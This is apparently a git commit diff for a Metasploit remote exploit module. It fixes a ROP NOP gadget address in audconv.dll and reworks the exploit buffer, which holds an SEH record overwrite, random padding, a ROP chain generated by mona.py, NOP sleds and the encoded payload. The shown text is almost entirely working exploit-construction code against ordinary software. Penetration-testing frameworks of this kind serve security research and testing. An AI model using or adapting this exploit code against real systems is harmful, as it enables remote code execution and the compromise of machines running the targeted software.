Fix ROP NOP address and reduce/remove NOPs
parent
08b6f74fb4
commit
e8a3984c85
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
rop_nop =
|
||||
[
|
||||
0x1003d55c # RETN (ROP NOP) [audconv.dll]
|
||||
0x1003d55d # RETN (ROP NOP) [audconv.dll]
|
||||
].flatten.pack('V*')
|
||||
|
||||
# ROP chain generated by mona.py - See corelan.be
|
||||
|
@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << generate_seh_record(target.ret)
|
||||
sploit << rand_text_alpha_upper(80)
|
||||
sploit << rop_nop
|
||||
sploit << make_nops(8)
|
||||
sploit << rand_text_alpha_upper(4)
|
||||
sploit << rop_gadgets
|
||||
sploit << make_nops(16)
|
||||
sploit << make_nops(4)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(10000)
|
||||
|
||||
|
|
Loading…
Reference in New Issue